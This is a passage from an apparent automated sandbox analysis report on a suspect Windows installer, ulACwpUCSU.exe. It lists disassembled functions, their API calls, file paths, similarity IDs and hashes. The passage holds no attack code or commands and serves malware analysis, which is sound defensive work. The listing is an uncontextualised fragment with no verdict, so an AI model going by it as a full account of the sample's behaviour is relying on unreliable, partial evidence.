                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                          • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                          • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                          • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                          Function 0040400E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,00403DEB), ref: 00404018
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
                                          • Instruction ID: f87940b9544c4de7e657a104dd6f20edac94ef916c9b89b279468f5034d51d6a
                                          • Opcode Fuzzy Hash: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
                                          • Instruction Fuzzy Hash: E2A01231404001DBCB014B10DF04C45FF21B7503007018030E50140034C6310420FF09
                                          Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(00000000), ref: 004014E5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 36591f86aa2c1f2adefcdb7238d8e5e1d903d288247f27f70a02a30479273739
                                          • Instruction ID: 4daead48d26ae6742cc4751adb680189456718570d67c7320b978f12710e1ab5
                                          • Opcode Fuzzy Hash: 36591f86aa2c1f2adefcdb7238d8e5e1d903d288247f27f70a02a30479273739
                                          • Instruction Fuzzy Hash: DFD0C7B7B141006BD750E7B86E8545A73E8F75135A7148837D502E1191D17DC9415519
                                          Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2905123603.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905192299.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905221858.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: AllocGlobal
                                          • String ID:
                                          • API String ID: 3761449716-0
                                          • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                          • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                          • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                          • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

                                          Non-executed Functions

                                          Function 0040499C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 004049B4
                                          • GetDlgItem.USER32(?,00000408), ref: 004049BF
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A09
                                          • LoadBitmapA.USER32(0000006E), ref: 00404A1C
                                          • SetWindowLongA.USER32(?,000000FC,00404F93), ref: 00404A35
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A49
                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A5B
                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404A71
                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A7D
                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A8F
                                          • DeleteObject.GDI32(00000000), ref: 00404A92
                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404ABD
                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404AC9
                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5E
                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B89
                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B9D
                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404BCC
                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404BDA
                                          • ShowWindow.USER32(?,00000005), ref: 00404BEB
                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CE8
                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D4D
                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D62
                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D86
                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404DA6
                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00404DBB
                                          • GlobalFree.KERNEL32(00000000), ref: 00404DCB
                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E44
                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404EED
                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EFC
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F1C
                                          • ShowWindow.USER32(?,00000000), ref: 00404F6A
                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F75
                                          • ShowWindow.USER32(00000000), ref: 00404F7C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N
                                          • API String ID: 1638840714-813528018
                                          • Opcode ID: 48884298102dd397bd7c84c821747a4fdce173a69a1f3747addc236cef338d07
                                          • Instruction ID: ec1b41ef9246f4b5ca9c31e675ea93c5522bc938a585a88f05d0904c7564d9ec
                                          • Opcode Fuzzy Hash: 48884298102dd397bd7c84c821747a4fdce173a69a1f3747addc236cef338d07
                                          • Instruction Fuzzy Hash: 7A025FB0900209AFEB10DF94DC85AAE7BB5FB84315F10817AFA10B62E1D7789D42DF58
                                          Function 0040442A Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404479
                                          • SetWindowTextA.USER32(00000000,?), ref: 004044A3
                                          • SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
                                          • CoTaskMemFree.OLE32(00000000), ref: 0040455F
                                          • lstrcmpiA.KERNEL32(Call,Supersuspicion Setup: Installing), ref: 00404591
                                          • lstrcatA.KERNEL32(?,Call), ref: 0040459D
                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF
                                            • Part of subcall function 0040552E: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 00405541
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 00405FF9
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,?,?,00000000), ref: 00406006
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040600B
                                            • Part of subcall function 00405FA1: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040601B
                                          • GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466C
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404687
                                            • Part of subcall function 004047E0: lstrlenA.KERNEL32(Supersuspicion Setup: Installing,Supersuspicion Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046FB,000000DF,00000000,00000400,?), ref: 0040487E
                                            • Part of subcall function 004047E0: wsprintfA.USER32 ref: 00404886
                                            • Part of subcall function 004047E0: SetDlgItemTextA.USER32(?,Supersuspicion Setup: Installing), ref: 00404899
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: A$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$Call$Supersuspicion Setup: Installing
                                          • API String ID: 2624150263-3564628124
                                          • Opcode ID: 460c116a5067c679cb5b5ce948a3056466bcf158c5435e38ad8be33a97865feb
                                          • Instruction ID: 5a451af96f6c61f8b8aedc9e732e962e3b59a2a539d705b9404eba0a1a8e20eb
                                          • Opcode Fuzzy Hash: 460c116a5067c679cb5b5ce948a3056466bcf158c5435e38ad8be33a97865feb
                                          • Instruction Fuzzy Hash: A6A162B1900208ABDB11AFA6CD45AEFB7B9EF85314F10843BF611B72D1D77C89418B69
                                          Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 21f2deb84e4fe94a37f3c530ba23b3725dbfe4e9087708a3ee461911f2001047
                                          • Instruction ID: 2b7524724565807a685c72c68d6b6eabb337ae57375c882a310f3ed35d4a28aa
                                          • Opcode Fuzzy Hash: 21f2deb84e4fe94a37f3c530ba23b3725dbfe4e9087708a3ee461911f2001047
                                          • Instruction Fuzzy Hash: D4F0EC72504110EBD700EBB4994DAEE77B8DF51314F60457BE141F21C1D3B84945E72E
                                          Function 00404135 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C0
                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F2
                                          • GetSysColor.USER32(?), ref: 00404203
                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
                                          • lstrlenA.KERNEL32(?), ref: 00404224
                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
                                          • GetDlgItem.USER32(?,0000040A), ref: 004042AA
                                          • SendMessageA.USER32(00000000), ref: 004042AD
                                          • GetDlgItem.USER32(?,000003E8), ref: 004042D8
                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00404327
                                          • SetCursor.USER32(00000000), ref: 00404330
                                          • ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404343
                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404350
                                          • SetCursor.USER32(00000000), ref: 00404353
                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040437F
                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404393
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                          • String ID: Call$N$open
                                          • API String ID: 3615053054-2563687911
                                          • Opcode ID: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                          • Instruction ID: 47d1c741c4840d0b501b4796cf3fe0e3440e9ec9cd7b0debe1a5eac4f9bfffd7
                                          • Opcode Fuzzy Hash: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                          • Instruction Fuzzy Hash: 8F61A0B1A40309BFEB109F61DD45F6A7B69FB84704F108026FB04BB2D1C7B8A951CB99
                                          Function 00405A6E Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405C12,?,?,00000001,004057B5,?,00000000,000000F1,?), ref: 00405A7E
                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405C12,?,?,00000001,004057B5,?,00000000,000000F1,?), ref: 00405AA2
                                          • GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405AAB
                                            • Part of subcall function 0040592C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040593C
                                            • Part of subcall function 0040592C: lstrlenA.KERNEL32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040596E
                                          • GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405AC8
                                          • wsprintfA.USER32 ref: 00405AE6
                                          • GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,00000004,00421E88,?,?,?,?,?), ref: 00405B21
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B30
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B68
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BBE
                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405BD0
                                          • GlobalFree.KERNEL32(00000000), ref: 00405BD7
                                          • CloseHandle.KERNEL32(00000000), ref: 00405BDE
                                            • Part of subcall function 004059C7: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 004059CB
                                            • Part of subcall function 004059C7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                          • String ID: %s=%s$NUL$[Rename]
                                          • API String ID: 1265525490-4148678300
                                          • Opcode ID: 042e64ae17e7c47ef1d56a04f1dfe6ef41ae4142583f66b70c6923dd5e444e24
                                          • Instruction ID: 2d1e09aab0418ff75005a817fdb93eb8b9645243d234663ae25a64343302d3c0
                                          • Opcode Fuzzy Hash: 042e64ae17e7c47ef1d56a04f1dfe6ef41ae4142583f66b70c6923dd5e444e24
                                          • Instruction Fuzzy Hash: BE41DEB1604A15BFD6206B219C49F6B3A6CDF45718F14053BBE01FA2D2EA7CB8018E7D
                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                          Download Yara Rule
                                          APIs
                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                          • Instruction ID: ce5436bc7dfccdabf5b2378cdbc04c65b8fc1f8d51739f20964cb8902a5fcb59
                                          • Opcode Fuzzy Hash: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                          • Instruction Fuzzy Hash: F2419A72804249AFCF058F94CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                          Function 00405FA1 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 00405FF9
                                          • CharNextA.USER32(?,?,?,00000000), ref: 00406006
                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040600B
                                          • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040601B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-2528599275
                                          • Opcode ID: cac177dc58e6cdce4745106bcf32f060ca56d97be21c35c0cc42ba282efa81fa
                                          • Instruction ID: 96a923a8ee4f60b6f191beee89bac6a1f57d38d5d4ddb578b75945660f6dc773
                                          • Opcode Fuzzy Hash: cac177dc58e6cdce4745106bcf32f060ca56d97be21c35c0cc42ba282efa81fa
                                          • Instruction Fuzzy Hash: 57110451908B9229FB325A284C40B777F99CF5A760F18047FE5C1722C2C67C5C529B6E
                                          Function 00404053 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongA.USER32(?,000000EB), ref: 00404070
                                          • GetSysColor.USER32(00000000), ref: 0040408C
                                          • SetTextColor.GDI32(?,00000000), ref: 00404098
                                          • SetBkMode.GDI32(?,?), ref: 004040A4
                                          • GetSysColor.USER32(?), ref: 004040B7
                                          • SetBkColor.GDI32(?,?), ref: 004040C7
                                          • DeleteObject.GDI32(?), ref: 004040E1
